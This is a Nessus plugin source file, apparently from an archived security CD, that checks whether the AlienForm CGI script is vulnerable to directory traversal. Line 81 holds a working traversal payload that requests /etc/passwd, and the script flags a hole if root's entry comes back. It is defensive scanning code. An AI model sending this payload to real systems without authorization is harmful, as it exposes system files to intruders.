home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / alienform.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  91 lines

  1. #
  2. # This script was written by Andrew Hintz ( http://guh.nu )
  3. #     and is based on code writen by Renaud Deraison
  4. #
  5. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  6. #      Erik Anderson <eanders@carmichaelsecurity.com>
  7. #      Added BugtraqID and CAN
  8. #
  9. # See the Nessus Scripts License for details
  10. #
  11.  
  12. if(description)
  13. {
  14.  script_id(11027);
  15.  script_bugtraq_id(4983);
  16.  script_version("$Revision: 1.12 $");
  17.  script_cve_id("CAN-2002-0934");
  18.  name["english"] = "AlienForm CGI script";
  19.  script_name(english:name["english"]);
  20.  
  21.  desc["english"] = "The AlienForm CGI script allows an attacker
  22. to view any file on the target computer, append arbitrary data 
  23. to an existing file, and write arbitrary data to a new file.
  24.  
  25. The AlienForm CGI script is installed as either af.cgi or
  26. alienform.cgi
  27.  
  28. For more details, please see:
  29. http://online.securityfocus.com/archive/1/276248/2002-06-08/2002-06-14/0
  30.  
  31. Solution : Disable AlienForm
  32. Risk factor : High
  33. ";
  34.  
  35.  
  36.  script_description(english:desc["english"]);
  37.  
  38.  summary["english"] = "Checks if the AlienForm CGI script is vulnerable";
  39.  
  40.  script_summary(english:summary["english"]);
  41.  
  42.  script_category(ACT_GATHER_INFO);
  43.  
  44.  script_copyright(english:"This script is Copyright (C) 2002 Andrew Hintz (http://guh.nu)");
  45.  
  46.  family["english"] = "CGI abuses";
  47.  script_family(english:family["english"]);
  48.  script_dependencie("find_service.nes", "no404.nasl");
  49.  script_require_ports("Services/www", 80);
  50.  exit(0);
  51. }
  52.  
  53. #
  54. # The script code starts here
  55. #
  56.  
  57. include("http_func.inc");
  58. include("http_keepalive.inc");
  59.  
  60.  
  61.  
  62. port = get_http_port(default:80);
  63.  
  64.  
  65. if(!get_port_state(port))exit(0);
  66.  
  67. if(http_is_dead(port:port))exit(0);
  68.  
  69.  
  70. http_keepalive_enabled(port:port);
  71.  
  72.  
  73.  
  74. foreach dir (cgi_dirs())
  75. {
  76. afcgi[0] = "af.cgi";
  77. afcgi[1] = "alienform.cgi";
  78.  
  79. for(d=0;afcgi[d];d=d+1)
  80. {
  81.    req = string(dir, "/", afcgi[d], "?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd");
  82.    req = http_get(item:req, port:port);
  83.    result = http_keepalive_send_recv(port:port, data:req);
  84.    if(result == NULL)exit(0);
  85.    if(egrep(pattern:"root:.*:0:[01]:.*", string:result)){
  86.        security_hole(port);
  87.     exit(0);
  88.     }
  89. }
  90. }
  91.